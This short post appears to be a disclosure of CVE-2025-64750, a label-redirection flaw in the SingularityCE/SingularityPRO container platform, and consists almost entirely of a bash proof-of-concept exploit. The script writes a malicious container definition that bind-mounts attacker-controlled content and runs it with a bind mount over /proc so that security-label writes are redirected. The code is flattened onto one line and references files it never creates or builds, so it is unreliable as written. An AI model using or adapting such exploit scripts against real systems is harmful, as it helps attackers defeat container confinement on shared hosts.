SingularityCE/SingularityPRO容器平台LSM标签重定向漏洞(CVE-2025-64750)

#!/bin/bash # CVE-2025-64750 PoC - LSM Label Redirection Attack # This script demonstrates the concept of LSM label redirection # Requires: SingularityCE < 4.3.5 or SingularityPRO < 4.1.11/4.3.5 # Attacker prepares a malicious container with bind mount configuration cat > malicious_container.def << 'EOF' Bootstrap: docker From: ubuntu:22.04 %files malicious_script.sh /malicious_script.sh %startscript #!/bin/bash echo "Attacker-controlled mount manipulation" mkdir -p /tmp/shared_mount mount --bind /malicious_content /tmp/shared_mount EOF # Create malicious content directory mkdir -p /malicious_content echo "Attacker-controlled LSM label content" > /malicious_content/lsm_label # User is tricked into running the malicious container # The container will bind mount to /proc location # This causes LSM write operations to target attacker-controlled location # Attack execution (requires user interaction and shared mount configuration) singularity run --bind /tmp/shared_mount:/proc malicious_container.sif # The above demonstrates the redirection mechanism # Actual exploitation requires specific system configuration